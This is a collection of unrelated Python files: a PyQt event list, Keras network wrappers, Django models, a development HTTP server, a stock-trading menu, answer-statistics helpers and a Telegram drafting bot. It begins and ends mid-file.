        return unicode( data )
class EventListWindow(QDialog, Ui_EventList):
    """Dialog listing all filtered events in a sortable tree, with CSV export."""

    # Column order shared by the tree widget and the CSV export
    # (column 0 is the event id).
    _FIELDS = ("Place", "Type", "Players", "Format", "Location",
               "Date", "Deck", "Wins", "Losses", "Draws")

    def __init__(self, parent):
        super(EventListWindow, self).__init__(parent)
        # The owning main window; holds eventData / filteredEventData.
        self.rent = parent
        self.setupUi(self)
        self.assignWidgets()
        # Mirror of the tree contents, kept for CSV export.
        self.csvList = []

    def updateGUI( self ):
        """Rebuild the tree widget and the CSV mirror from the filtered events."""
        # Disable sorting while inserting so rows keep their intended order.
        self.eventTree.setSortingEnabled(False)
        self.eventTree.clear()
        del self.csvList[:]
        self.csvList.append(["ID"] + list(self._FIELDS))
        for eventId in self.rent.filteredEventData:
            event = self.rent.eventData[eventId]
            eventItem = TreeWidgetItem(self.eventTree)
            eventItem.setText(0, eventId)
            for col, field in enumerate(self._FIELDS, start=1):
                eventItem.setText(col, text(event[field]))
            self.eventTree.addTopLevelItem(eventItem)
            self.csvList.append([eventId] + [event[field] for field in self._FIELDS])
        self.eventTree.setSortingEnabled(True)
        for i in range(11):
            self.eventTree.resizeColumnToContents(i)

    def cancelPressed( self ):
        """Hide (not destroy) the dialog so it can be reshown quickly."""
        self.hide()

    def eventSelected( self, ourEvent, ourColumn ):
        """Open (lazily creating) the detail window for a double-clicked event."""
        eventId = ourEvent.text(0)
        if not self.rent.eventData[eventId]["WindowObject"]:
            self.rent.eventData[eventId]["WindowObject"] = EventWindow( self.rent, eventId )
        self.rent.eventData[eventId]["WindowObject"].show()

    def exportStatsPressed( self ):
        """Ask for a target path and write the current view as CSV."""
        # getSaveFileName returns (fileName, selectedFilter).
        filename = QFileDialog.getSaveFileName(self, 'Selection a location to save your data to:', os.getenv('HOME'), 'CSV Files (*.csv)')
        if filename[0]:
            # BUG FIX: csv.writer needs a binary file on Python 2 but a
            # text file opened with newline='' on Python 3; the previous
            # unconditional "wb" raised a TypeError under Python 3.
            if sys.version_info >= (3, 0):
                f = open(filename[0], "w", newline="")
            else:
                f = open(filename[0], "wb")
            with f:
                csv.writer(f).writerows(self.csvList)
            self.rent.messageBox( "Data exported successfully." )

    def assignWidgets( self ):
        """Connect buttons and tree signals to their handlers."""
        self.adjustFiltersButton.clicked.connect(lambda: self.rent.filtersWindow.show())
        self.cancelButton.clicked.connect(self.cancelPressed)
        self.exportStatsButton.clicked.connect(self.exportStatsPressed)
        self.eventTree.itemDoubleClicked.connect(self.eventSelected)
# Custom tree item so columns sort numerically when both values parse as
# floats, and lexically otherwise.
class TreeWidgetItem( QTreeWidgetItem ):
    def __init__(self, parent=None):
        QTreeWidgetItem.__init__(self, parent)
    def __lt__(self, otherItem):
        """Compare by the currently sorted column, numerically when possible.

        NOTE(review): this returns ``self > other`` from ``__lt__``, which
        inverts Qt's sort direction for every column. Possibly intentional
        (ascending header click yields descending data) — confirm before
        "fixing" the operator.
        """
        column = self.treeWidget().sortColumn()
        try:
            return float( self.text(column) ) > float( otherItem.text(column) )
        except ValueError:
            # At least one value is not numeric; fall back to string compare.
            return self.text(column) > otherItem.text(column)
|
# kkeras.py
import numpy as np
#np.random.seed(1337) # for reproducibility
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.layers import Convolution1D, Flatten
from keras.optimizers import RMSprop #,SGD, Adam,
from keras.utils import np_utils
from keras import callbacks
from keras.regularizers import l2
import kutil
class MLPC():
    """
    Multi layer perceptron classification
    Define multi layer perceptron using Keras
    """
    def __init__(self, l = [49, 30, 10, 3]):
        """
        modeling is performed in self.modeling()
        instead of direct performing in this function.

        l -- layer widths: [input_dim, hidden1, hidden2, n_classes].
        NOTE: the mutable default list is shared across calls; it is
        only read here, so this is safe but worth knowing.
        """
        model = self.modeling( l = l)
        model.compile(loss='categorical_crossentropy',
            optimizer=RMSprop(),
            metrics=['accuracy'])
        self.model = model
    def modeling(self, l = [49, 30, 10, 3]):
        """
        generate model

        Two ReLU hidden layers with 20% dropout each; softmax output.
        """
        model = Sequential()
        model.add(Dense( l[1], input_shape=(l[0],)))
        model.add(Activation('relu'))
        model.add(Dropout(0.2))
        model.add(Dense( l[2]))
        model.add(Activation('relu'))
        model.add(Dropout(0.2))
        model.add(Dense( l[3]))
        model.add(Activation('softmax'))
        return model
    def X_reshape( self, X_train_2D, X_val_2D = None):
        """
        Used for child classes such as convolutional networks
        When the number of arguments is only one,
        only one values will be returned.

        The MLP base class needs no reshaping, so inputs pass through.
        """
        if X_val_2D is None:
            return X_train_2D
        else:
            return X_train_2D, X_val_2D
    def fit( self, X_train, y_train, X_val, y_val, nb_classes = None, batch_size=10, nb_epoch=20, verbose = 0):
        """Train with early stopping (patience 3) on validation loss.

        y labels are integer class ids; nb_classes is inferred from
        y_train when not given. Stores nb_classes and the Keras history
        on self for later score() calls.
        """
        model = self.model
        if nb_classes is None:
            nb_classes = max( set( y_train)) + 1
        Y_train = np_utils.to_categorical(y_train, nb_classes)
        Y_val = np_utils.to_categorical(y_val, nb_classes)
        model.reset_states()
        earlyStopping=callbacks.EarlyStopping(monitor='val_loss', patience=3, verbose=verbose, mode='auto')
        # Child classes may reshape 2-D inputs (e.g. add a channel axis).
        X_train, X_val = self.X_reshape( X_train, X_val)
        history = model.fit(X_train, Y_train,
            batch_size=batch_size, nb_epoch=nb_epoch,
            verbose=verbose, validation_data=(X_val, Y_val), callbacks=[earlyStopping])
        self.nb_classes = nb_classes
        self.history = history
    def score( self, X_test, y_test):
        """Return classification accuracy on the test set."""
        model = self.model
        nb_classes = self.nb_classes
        Y_test = np_utils.to_categorical(y_test, nb_classes)
        X_test = self.X_reshape( X_test)
        score = model.evaluate(X_test, Y_test, verbose=0)
        # evaluate() returns [loss, accuracy]; accuracy is wanted.
        return score[1]
class CNNC( MLPC):
    """1-D convolutional classifier; inherits fit/score from MLPC."""
    def __init__(self, n_cv_flt = 2, n_cv_ln = 3, cv_activation = 'relu', l = [49, 30, 10, 3]):
        """
        Convolutional neural networks

        n_cv_flt -- number of convolution filters
        n_cv_ln -- convolution kernel length
        cv_activation -- activation applied after the convolution
        l -- widths as in MLPC: [input_dim, hidden1, hidden2, n_classes]
        """
        self.n_cv_flt = n_cv_flt
        self.n_cv_ln = n_cv_ln
        self.cv_activation = cv_activation
        # Attributes must be set before super().__init__ because it
        # calls self.modeling(), which reads them. Python-3-only super().
        super().__init__( l = l)
    def modeling(self, l = [49, 30, 10, 3]):
        """
        generate model

        Conv1D front-end over (l[0], 1)-shaped input, then the same
        dense stack as MLPC.
        """
        n_cv_flt, n_cv_ln = self.n_cv_flt, self.n_cv_ln
        cv_activation = self.cv_activation
        model = Sequential()
        # Direct: input_shape should be (l,0) not (l)
        # if l, it assume a scalar for an input feature.
        #model.add(Dense( l[1], input_shape=(l[0],)))
        # Convolution
        print( "n_cv_flt, n_cv_ln, cv_activation", n_cv_flt, n_cv_ln, cv_activation)
        model.add(Convolution1D( n_cv_flt, n_cv_ln, activation=cv_activation, border_mode='same', input_shape=(l[0], 1)))
        model.add(Flatten())
        model.add(Dense( l[1]))
        model.add(Activation('relu'))
        model.add(Dropout(0.2))
        model.add(Dense( l[2]))
        model.add(Activation('relu'))
        model.add(Dropout(0.2))
        model.add(Dense( l[3]))
        model.add(Activation('softmax'))
        return model
    def X_reshape( self, X_train_2D, X_val_2D = None):
        """
        1D convolution and 2D convolution ordering different
        1D: -1,1 (e.g., 50,1 and 50,3 for BK, RGB), input_shape = (50,1) or (50,3)
        2D: 1,n,m (e.g., 1,128,128 and 3,128,128 for BK, RGB), input_shape = (1,128,128) or (3,128,128)
        """
        # Add a trailing channel axis: (N, F) -> (N, F, 1).
        X_train_3D = X_train_2D.reshape(X_train_2D.shape[0], -1, 1)
        if X_val_2D is None:
            return X_train_3D
        else:
            X_val_3D = X_val_2D.reshape(X_val_2D.shape[0], -1, 1)
            return X_train_3D, X_val_3D
class CNNC_Name( CNNC):
    """CNNC variant that names the convolution layer so its weights can
    be retrieved later via get_c_wb()."""
    def modeling(self, l = [49, 30, 10, 3]):
        """
        generate model

        Same architecture as CNNC, but the conv layer is registered
        under self.c_name and all layers are indexed in self.layer_dict.
        """
        # Name under which the convolution layer is registered.
        self.c_name = 'conv'
        n_cv_flt, n_cv_ln = self.n_cv_flt, self.n_cv_ln
        cv_activation = self.cv_activation
        model = Sequential()
        # Direct: input_shape should be (l,0) not (l)
        # if l, it assume a scalar for an input feature.
        #model.add(Dense( l[1], input_shape=(l[0],)))
        # Convolution
        print( "n_cv_flt, n_cv_ln, cv_activation", n_cv_flt, n_cv_ln, cv_activation)
        #model.add(Convolution1D( n_cv_flt, n_cv_ln, activation=cv_activation,
        #	border_mode='same', input_shape=(1, l[0]), name = 'conv'))
        model.add(Convolution1D( n_cv_flt, n_cv_ln, activation=cv_activation,
            border_mode='same', input_shape=(l[0],1), name = self.c_name))
        model.add(Flatten())
        model.add(Dense( l[1]))
        model.add(Activation('relu'))
        model.add(Dropout(0.2))
        model.add(Dense( l[2]))
        model.add(Activation('relu'))
        model.add(Dropout(0.2))
        model.add(Dense( l[3]))
        model.add(Activation('softmax'))
        # Map layer name -> layer for later weight extraction.
        self.layer_dict = dict([(layer.name, layer) for layer in model.layers])
        return model
    def get_layer( self, name):
        """Return the layer registered under *name*."""
        return self.layer_dict[ name]
    def self_c_wb( self):
        """Cache the conv layer's (weights, biases) on self; return self."""
        self.c_w, self.c_b = self.get_layer( self.c_name).get_weights()
        return self
    def get_c_wb( self):
        """Return the conv layer's (weights, biases) tuple."""
        self.self_c_wb()
        return self.c_w, self.c_b
class MLPR(): # Regression
    """
    Multi layer perceptron regression
    Define multi layer perceptron using Keras
    """
    def __init__(self, l = [49, 30, 10, 1]):
        """
        modeling is performed in self.modeling()
        instead of direct performing in this function.

        l -- layer widths: [input_dim, hidden..., output_dim]. Any
        length >= 3 is accepted. BUG FIX: modeling() previously
        hard-coded l[4], so this constructor's own 4-element default
        raised IndexError; modeling() is now depth-generic.
        """
        model = self.modeling( l = l)
        model.compile(loss='mean_squared_error', optimizer='adam')
        self.model = model
    def modeling(self, l = [2121, 100, 50, 10, 1]):
        """
        generate model

        ReLU hidden layers for l[1:-1]; linear output of width l[-1].
        For the 5-element default this builds exactly the previous
        stack (100-50-10 ReLU, then Dense(1)).
        """
        model = Sequential()
        model.add(Dense( l[1], input_shape=(l[0],)))
        model.add(Activation('relu'))
        for n_units in l[2:-1]:
            model.add(Dense( n_units))
            model.add(Activation('relu'))
        # Linear output layer (no activation) for regression.
        model.add(Dense( l[-1]))
        return model
    def X_reshape( self, X_train_2D, X_val_2D = None):
        """
        Used for child classes such as convolutional networks
        When the number of arguments is only one,
        only one values will be returned.
        """
        if X_val_2D is None:
            return X_train_2D
        else:
            return X_train_2D, X_val_2D
    def fit( self, X_train, Y_train, X_val, Y_val, batch_size=10, nb_epoch=20, verbose = 0):
        """Train with early stopping (patience 3) on validation loss.

        Unlike MLPC, targets are used as-is (no one-hot encoding).
        """
        model = self.model
        model.reset_states()
        earlyStopping=callbacks.EarlyStopping(monitor='val_loss', patience=3, verbose=verbose, mode='auto')
        # Child classes may reshape 2-D inputs (e.g. add a channel axis).
        X_train, X_val = self.X_reshape( X_train, X_val)
        history = model.fit(X_train, Y_train,
            batch_size=batch_size, nb_epoch=nb_epoch,
            verbose=verbose, validation_data=(X_val, Y_val), callbacks=[earlyStopping])
        self.history = history
    def score( self, X_test, Y_test, batch_size=32, verbose=0):
        """Predict on X_test and report regression metrics via kutil."""
        model = self.model
        X_test = self.X_reshape( X_test)
        Y_test_pred = model.predict(X_test, batch_size=batch_size, verbose=verbose)
        return kutil.regress_show4( Y_test, Y_test_pred)
    def predict( self, X_new, batch_size=32, verbose=0):
        """Return model predictions for new inputs."""
        model = self.model
        X_new = self.X_reshape(X_new)
        y_new = model.predict(X_new, batch_size=batch_size, verbose=verbose)
        return y_new
|
from django.db import models
from django.contrib.auth.models import AbstractBaseUser,PermissionsMixin,BaseUserManager
from django.conf import settings
from django.utils.text import Truncator
class UserProfileManager(BaseUserManager):
    """Manager for user profiles (email acts as the username field)."""

    def _create_user(self, email, name, password, **extra_fields):
        """Create and save a user with the given name, email and password.

        Raises ValueError when no email is supplied.
        """
        if not email:
            raise ValueError("User must provide an email")
        email = self.normalize_email(email)
        user = self.model(email=email, name=name, **extra_fields)
        user.set_password(password)
        user.save(using=self._db)
        return user

    def create_user(self, email, name, password, **extra_fields):
        """Create a new (non-staff, non-superuser) user profile."""
        extra_fields.setdefault("is_staff", False)
        extra_fields.setdefault("is_superuser", False)
        return self._create_user(email, name, password, **extra_fields)

    def create_superuser(self, email, name, password, **extra_fields):
        """Create a new superuser.

        BUG FIX: the is_staff/is_superuser flags are now validated
        *before* the user is created; previously an invalid flag raised
        only after the row had already been saved to the database.
        """
        extra_fields.setdefault("is_staff", True)
        extra_fields.setdefault("is_superuser", True)
        if extra_fields.get("is_staff") is not True:
            raise ValueError("Superuser must have is_staff=True")
        if extra_fields.get("is_superuser") is not True:
            raise ValueError("Superuser must have is_superuser=True")
        return self._create_user(email, name, password, **extra_fields)
class UserProfile(AbstractBaseUser,PermissionsMixin):
    """Database model for users in the system """
    # Email doubles as the login identifier (see USERNAME_FIELD).
    email=models.EmailField(max_length=255,unique=True)
    name=models.CharField(max_length=255)
    is_active=models.BooleanField(default=True)
    is_staff=models.BooleanField(default=False)
    objects=UserProfileManager()
    USERNAME_FIELD="email"
    REQUIRED_FIELDS=["name"]
    def __str__(self):
        """Retrieve string representation of the user"""
        return self.email
    def get_full_name(self):
        """Retrieve full name of user"""
        return self.name
    def get_short_name(self):
        """Retrieve short name of the user"""
        return self.name
class Tweet(models.Model):
    """Database Model for user's tweets"""
    # Deleting the author cascades to their tweets.
    author=models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE)
    message=models.TextField(max_length=4000)
    created_at=models.DateTimeField(auto_now_add=True)
    updated_at=models.DateTimeField(auto_now=True)
    def __str__(self):
        """Returns the message truncated to 30 chars as the representation"""
        truncated_message=Truncator(self.message)
        return truncated_message.chars(30)
class Comment(models.Model):
    """Database model for comments attached to tweets."""
    # nullable so a comment can outlive... NOTE(review): null=True here
    # combined with CASCADE is unusual — confirm orphan comments are
    # intended to be allowed.
    tweet=models.ForeignKey(Tweet,on_delete=models.CASCADE,null=True)
    comment=models.TextField(max_length=400)
    created_at=models.DateTimeField(auto_now_add=True)
    updated_at=models.DateTimeField(auto_now=True)
    author=models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE
    )
    def __str__(self):
        """Returns a string representation of the Comment Model"""
        truncated_message=Truncator(self.comment)
        return truncated_message.chars(30)
#
|
#
# Copyright (c) 2010 BitTorrent Inc.
#
import BaseHTTPServer
import logging
import SimpleHTTPServer
import os
import urllib
import apps.command.base
class GriffinRequests(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """Development request handler (Python 2) that serves project files,
    falling back to the 'build' directory when a path is not found, and
    accepts POST uploads into the 'test' directory.
    """
    def address_string(self):
        # Non-localhost calls get timeouts in getfqdn
        # (why does a "Basic" http server do this?)
        return self.client_address[0]
    def translate_path(self, path):
        # Firefox on windows (for some reason) sends /asdf\asdf instead of
        # /asdf/asdf
        path = urllib.unquote(path).replace('\\', '/')
        return SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(
            self, path)
    def send_head(self):
        # Special version of send_head that falls back to the build directory.
        # Returns an open file object on success, None when the path is
        # missing (do_GET then retries under /build).
        path = self.translate_path(self.path)
        f = None
        if os.path.isdir(path):
            if not self.path.endswith('/'):
                # redirect browser - doing basically what apache does
                self.send_response(301)
                self.send_header("Location", self.path + "/")
                self.end_headers()
                return None
            for index in "index.html", "index.htm":
                # XXX - Modification: the site root serves build/index.html.
                if self.path == '/':
                    path = os.path.join(path, 'build')
                index = os.path.join(path, index)
                if os.path.exists(index):
                    path = index
                    break
            else:
                # No index file found: show a directory listing instead.
                return self.list_directory(path)
        ctype = self.guess_type(path)
        try:
            # Always read in binary mode. Opening files in text mode may cause
            # newline translations, making the actual size of the content
            # transmitted *less* than the content-length!
            f = open(path, 'rb')
        except IOError:
            # XXX - Modification, don't send the error here.
            return None
        self.send_response(200)
        self.send_header("Content-type", ctype)
        fs = os.fstat(f.fileno())
        self.send_header("Content-Length", str(fs[6]))
        self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
        self.end_headers()
        return f
    def do_GET(self):
        # Try the literal path first, then retry under /build; only 404
        # when both misses.
        f = self.send_head()
        if not f:
            self.path = '/build' + self.path
            f = self.send_head()
            if not f:
                self.send_error(404, 'File not found')
        if f:
            self.copyfile(f, self.wfile)
            f.close()
    def do_POST(self):
        # Store the request body under test/<path> and acknowledge.
        fp = open(os.path.join('test', self.path[1:]), 'wb')
        fp.write(self.rfile.read(int(self.headers['Content-Length'])))
        fp.close()
        self.send_response(200)
class serve(apps.command.base.Command):
    """Command that runs a local development HTTP server for debugging."""
    help = 'Run a development server to debug the project.'
    user_options = [ ('port=', 'p', 'Port to listen on.', None) ]
    option_defaults = { 'port': '8080' }
    pre_commands = [ 'generate' ]
    def run(self):
        """Announce the URL, then block forever serving requests."""
        logging.info('\tstarting server, access it at http://localhost:%s' % (
            self.options['port'],))
        port = int(self.options['port'])
        server = BaseHTTPServer.HTTPServer(('', port), GriffinRequests)
        server.serve_forever()
|
import model
import view
# TODO update print statements for trader menu 3 + 7
def main_menu():
    """main menu for account creation/login

    Loops showing the welcome menu. Option 1 creates and saves an account,
    option 2 logs in (returns the Account object), option 3 exits the loop
    (returns None, which ends the program in the __main__ block).
    """
    while True:
        print()
        view.welcome()
        print()
        view.main_menu_options()
        try:
            mm_choice = int(view.menu_input())
        except ValueError:
            view.bad_input()
            continue
        if mm_choice not in (1, 2, 3):
            view.bad_input()
        # new user
        elif mm_choice == 1:
            # returns username, first name, last name, account_id, pass_hash, balance
            try:
                create_inputs = view.new_account_inputs()
            except ValueError:
                view.balance_needs_float()
                continue
            account = model.Account(create_inputs)
            account.set_hashed_password(account.pass_hash)
            account.save()
        # login
        elif mm_choice == 2:
            # returns a tuple of username, password
            login_inputs = view.login_inputs()
            account = model.Account(username=login_inputs[0], password=login_inputs[1])
            # NOTE(review): returns whenever the Account object is truthy —
            # confirm model.Account is falsy on bad credentials, otherwise
            # view.bad_credentials() is unreachable.
            if account:
                return account
            view.bad_credentials()
        else:
            break
def trader_menu(account):
    """Menu loop for actions available post-login.

    Repeatedly prompts until the user chooses option 8 (log out).
    Options: 1 balance, 2 deposit, 3 positions, 4 price lookup,
    5 buy, 6 sell, 7 trade history.

    Bug fix: the bare ``except:`` clauses around the buy/sell quantity
    parsing now catch only ValueError, so KeyboardInterrupt/SystemExit
    and unrelated errors are no longer silently swallowed.
    """
    while True:
        print()
        view.trader_menu()
        try:
            trader_input = int(view.menu_input())
        except ValueError:
            view.bad_input()
            continue
        if trader_input not in range(1, 9):
            view.bad_input()
        # check balance
        elif trader_input == 1:
            view.account_balance(account.balance)
        # deposit money
        elif trader_input == 2:
            try:
                deposit_amount = float(view.deposit_input())
            except ValueError:
                view.bad_input()
                continue
            account.balance += deposit_amount
            account.save()
        # check positions
        elif trader_input == 3:
            view.print_positions(account.get_positions())
        # lookup price
        elif trader_input == 4:
            try:
                ticker_symbol = view.ticker_input()
                stock_price = model.lookup_price(ticker_symbol)
                view.print_lookup_price(stock_price)
            except ValueError:
                view.bad_stock_input()
        # buy order
        elif trader_input == 5:
            buy_ticker_symbol = view.ticker_input()
            try:
                buy_quantity = int(view.buy_amount())
            except ValueError:  # was a bare except: — only int() can fail here
                view.bad_input()
                continue
            try:
                account.buy(buy_ticker_symbol, buy_quantity)
            except ValueError:
                view.bad_buy()
        # sell order
        elif trader_input == 6:
            sell_ticker_symbol = view.ticker_input()
            try:
                sell_quantity = int(view.sell_amount())
            except ValueError:  # was a bare except: — only int() can fail here
                view.bad_input()
                continue
            try:
                account.sell(sell_ticker_symbol, sell_quantity)
            except ValueError:
                view.bad_sell()
        # order history
        elif trader_input == 7:
            view.trade_history(account.get_trades())
        # log out
        elif trader_input == 8:
            break
if __name__ == "__main__":
    # Main program loop: a successful login returns an Account and opens the
    # trader menu; choosing "exit" in the main menu returns None and quits.
    while True:
        results = main_menu()
        if not results:
            break
        trader_menu(results)
"""Statistics Tool for Answerable
This file contains the functions used to analyze user answers.
"""
#
# TAG RELATED METRICS (USING QA)
#
# Module-level cache: computed once, reused on later calls.
_tags_info = None
def tags_info(qa):
    """Map each tag to its score, acceptance and count"""
    global _tags_info
    if _tags_info is None:
        accumulated = {}
        for _, answer in qa:
            for tag in answer["tags"]:
                score, accepted, count = accumulated.get(tag, (0, 0, 0))
                accumulated[tag] = (
                    score + answer["score"],
                    accepted + answer["is_accepted"],
                    count + 1,
                )
        _tags_info = accumulated
    return _tags_info
def top_tags_use(qa, top=5):
    """Top tags by appearance"""
    info = tags_info(qa)
    ranked = sorted(info.items(), key=lambda kv: kv[1][2], reverse=True)
    return [(tag, stats[2]) for tag, stats in ranked[:top]]
def top_tags_score_abs(qa, top=5):
    """Top tags by accumulated score"""
    info = tags_info(qa)
    ranked = sorted(info.items(), key=lambda kv: kv[1][0], reverse=True)
    return [(tag, stats[0]) for tag, stats in ranked[:top]]
def top_tags_acceptance_abs(qa, top=5):
    """Top tags by accumulated acceptance"""
    info = tags_info(qa)
    ranked = sorted(info.items(), key=lambda kv: kv[1][1], reverse=True)
    return [(tag, stats[1]) for tag, stats in ranked[:top]]
def top_tags_score_rel(qa, top=5):
    """Top tags by score per answer"""
    info = tags_info(qa)
    per_answer = lambda stats: stats[0] / stats[2]
    ranked = sorted(info.items(), key=lambda kv: per_answer(kv[1]), reverse=True)
    return [(tag, per_answer(stats)) for tag, stats in ranked[:top]]
def top_tags_acceptance_rel(qa, top=5):
    """Top tags by acceptance per answer"""
    info = tags_info(qa)
    per_answer = lambda stats: stats[1] / stats[2]
    ranked = sorted(info.items(), key=lambda kv: per_answer(kv[1]), reverse=True)
    return [(tag, per_answer(stats)) for tag, stats in ranked[:top]]
#
# ANSWER RELATED METRICS
#
def top_answers(answers, top=5):
    """Top answers by score"""
    ranked = sorted(answers, key=lambda ans: ans["score"], reverse=True)
    return ranked[:top]
def top_accepted(answers, top=5):
    """Top accepted answers by score"""
    accepted_only = [ans for ans in answers if ans["is_accepted"]]
    accepted_only.sort(key=lambda ans: ans["score"], reverse=True)
    return accepted_only[:top]
#
# REPUTATION RELATED METRICS
#
def reputation(answer):
    """Reputation associated to an answers
    NOT ACCURATE
    """
    # +10 per point of score, +15 bonus when the answer was accepted.
    return 10 * answer["score"] + 15 * answer["is_accepted"]
# Caches shared by the reputation helpers below (computed lazily, once).
_answers_sorted_reputation = None
_total_reputation = None
def answers_sorted_reputation(answers):
    """Answers sorted by associated reputation"""
    global _answers_sorted_reputation
    if _answers_sorted_reputation is None:
        _answers_sorted_reputation = sorted(answers, key=reputation, reverse=True)
    return _answers_sorted_reputation
def total_reputation(answers):
    """Total reputation gained from answers"""
    global _total_reputation
    if _total_reputation is None:
        _total_reputation = sum(reputation(ans) for ans in answers)
    return _total_reputation
def average_reputation_weight(answers, w):
    """Average reputation and weight of answers generating w % reputation"""
    target = total_reputation(answers) * w
    ranked = answers_sorted_reputation(answers)
    gained = 0
    taken = 0
    # Walk the best answers first until the target reputation is reached.
    for answer in ranked:
        if gained >= target:
            break
        gained += reputation(answer)
        taken += 1
    if taken == 0:
        return (0, 0)
    return (gained / taken, 100 * taken / len(answers))
#
# LISTS TO SIMPLIFY CALLING
#
# Each entry pairs a human-readable label with the callable computing it.
tag_metrics = [  # call with qa
    ("Top used tags", top_tags_use),
    ("Top tags by accumulated score", top_tags_score_abs),
    ("Top tags by score per answer", top_tags_score_rel),
    ("Top tags by accumulated acceptance", top_tags_acceptance_abs),
    ("Top tags by acceptance per answer", top_tags_acceptance_rel),
]
answer_metrics_single = [  # call with answers
    ("Answers analyzed", len),
    ("Total score", lambda x: sum([a["score"] for a in x])),
    ("Average score", lambda x: sum([a["score"] for a in x]) / len(x)),
    ("Total accepted", lambda x: sum([a["is_accepted"] for a in x])),
    ("Acceptance ratio", lambda x: sum([a["is_accepted"] for a in x]) / len(x)),
]
# Third element extracts the value displayed for each top answer.
answer_metrics_tops = [  # call with answers
    ("Top answers by score", top_answers, lambda a: a["score"]),
    ("Top accepted answers by score", top_accepted, lambda a: a["score"]),
]
reputation_metrics_single = [  # call with answers
    ("Total reputation", lambda x: sum([reputation(a) for a in x])),
    ("Average reputation", lambda x: sum([reputation(a) for a in x]) / len(x)),
]
# (weights, metric function, format strings for the two returned values).
reputation_weight_metrics = (  # call with answers and weights
    [0.95, 0.80],
    average_reputation_weight,
    (
        "Average reputation on answers generating {:.0f}% reputation",
        "Percentage of answers generating {:.0f}% reputation",
    ),
)
|
from array import *
def dupli(n):
    """Return the first value in *n* that repeats; -1 if all values are unique.

    Works on any iterable of hashable values (array, list, tuple, ...).
    Improvements: iterates values directly instead of range(len(n)),
    and drops the redundant n_dupli temporary.
    """
    seen = set()
    for value in n:
        if value in seen:
            return value
        seen.add(value)
    return -1
# Demo: 3 appears twice, so dupli prints 3.
n=array('i',[1,3,5,4,32,65,53,243,3])
print(dupli(n))
|
import re
import io
import deckstat_interface as deckstat
import logging
from utils import set_boosters
from time import sleep
from random import shuffle
from filters import restrict, SealedConv, UserType
from functools import partial
from model import session, Cube, CubeList, Game, Player, Card, Deck, DeckList, Draft, Drafter
from telegram import InlineKeyboardButton, InlineKeyboardMarkup, MessageEntity, ReplyKeyboardRemove
from telegram.ext import Filters, CommandHandler, ConversationHandler, MessageHandler, CallbackQueryHandler
class DraftHandler:
    """Telegram handlers driving cube sealed pools and booster drafts.

    Registers two ConversationHandlers (/draft and /sealed) that first ask
    for a cube, then for the participating players, then hand off to the
    matching start_* behaviour.
    """
    def __init__(self, dispatcher):
        """Store the dispatcher and register the /draft and /sealed entry points."""
        self.dispatcher = dispatcher
        self.players = []      # all Player rows, loaded when a cube is chosen
        self.subscribers = []  # players selected for the current event
        self.cube = None       # currently selected Cube
        # Draft
        self.draft = None
        self.drafted_card_handler = None
        self.draft_pool_handler = None
        self.draft_handler = self.get_select_player_convHandler("draft", self.start_draft)
        dispatcher.add_handler(self.draft_handler)
        # Sealed
        self.sealed_handler = self.get_select_player_convHandler("sealed", self.start_sealed)
        dispatcher.add_handler(self.sealed_handler)
    def get_select_player_convHandler(self, command, behaviour):
        """Build the cube-then-players conversation for *command*.

        *behaviour* is invoked once the player selection is confirmed.
        """
        conv_handler = ConversationHandler(
            entry_points=[CommandHandler(command, self.start_select_cube)],
            states={
                SealedConv.CUBE: [CallbackQueryHandler(self.choose_cube, pattern=r"cube_id=(\d*)$")],
                SealedConv.CHOOSING: [CallbackQueryHandler(partial(self.choose_player, behaviour),
                                                           pattern=r"player_id=(\d*)$")]
            },
            fallbacks=[])
        return conv_handler
    def get_select_player_keyboard(self):
        """Inline keyboard of selectable players plus confirm/undo/cancel rows.

        Player ids 0/1/2 in callback_data are reserved for cancel/send/undo.
        NOTE(review): the ``< 5`` cap presumably limits event size — confirm.
        """
        # subscribers = sealed_players
        keyboard = []
        if len(self.subscribers) < 5:
            for player in self.players:
                if player not in self.subscribers:
                    keyboard.append([InlineKeyboardButton(player.name, callback_data=f"player_id={player.id}")])
        if len(self.subscribers):
            keyboard.append([InlineKeyboardButton("Corriger", callback_data="player_id=2"),
                             InlineKeyboardButton("Envoyer", callback_data="player_id=1")])
        keyboard.append([InlineKeyboardButton("Annuler", callback_data="player_id=0")])
        return keyboard
    @restrict(UserType.ADMIN)
    def start_select_cube(self, update, context):
        """Conversation entry point (admin-only): ask which cube to use."""
        keyboard = []
        cubes = session.query(Cube).all()
        for cube in cubes:
            keyboard.append([InlineKeyboardButton(cube.name, callback_data=f"cube_id={cube.id}")])
        keyboard.append([InlineKeyboardButton("Annuler", callback_data="cube_id=0")])
        reply_markup = InlineKeyboardMarkup(keyboard)
        text = "Selectionne un cube :"
        update.message.reply_text(text=text,
                                  reply_markup=reply_markup)
        return SealedConv.CUBE
    def choose_cube(self, update, context):
        """Handle the cube choice callback; id 0 cancels the conversation."""
        query = update.callback_query
        reg = re.compile(r"cube_id=(\d*)")
        match = int(reg.findall(query.data)[0])
        if match == 0:
            text = "Limité annulé, pour recommencer: /sealed ou /draft"
            query.edit_message_text(text=text)
            return ConversationHandler.END
        else:
            self.cube = session.query(Cube).filter(Cube.id == match).one()
            # TODO: load here cube specific draft behaviour
            self.players = session.query(Player).all()
            reply_markup = InlineKeyboardMarkup(self.get_select_player_keyboard())
            text = f"Cube sélectionné: {self.cube.name}\nSélectionne maintenant les joueurs qui participeront :"
            query.edit_message_text(text=text,
                                    reply_markup=reply_markup)
            return SealedConv.CHOOSING
    def choose_player(self, behaviour, *args):
        """Handle player-selection callbacks.

        callback_data ids: "0" cancel, "1" confirm (runs *behaviour*),
        "2" undo the last pick, anything else adds that player.
        """
        update, context = args
        query = update.callback_query
        reg = re.compile(r"player_id=(\d*)")
        match = reg.findall(query.data)[0]
        if match == "0":
            text = "Limité annulé, pour recommencer: /sealed ou /draft"
            query.edit_message_text(text=text)
            self.subscribers = []
            return ConversationHandler.END
        elif match == "1":
            # players are selected, start something
            text = "Joueurs selectionnés:\n"
            for player in self.subscribers:
                text += f"- <a href='tg://user?id={player.id}'>{player.name}</a>\n"
            query.edit_message_text(text=text, parse_mode="HTML")
            behaviour(update, context)
            self.subscribers = []
            return ConversationHandler.END
        elif match == "2":
            # Remove last
            del self.subscribers[-1]
            text = "Joueurs selectionnés:\n"
            for player in self.subscribers:
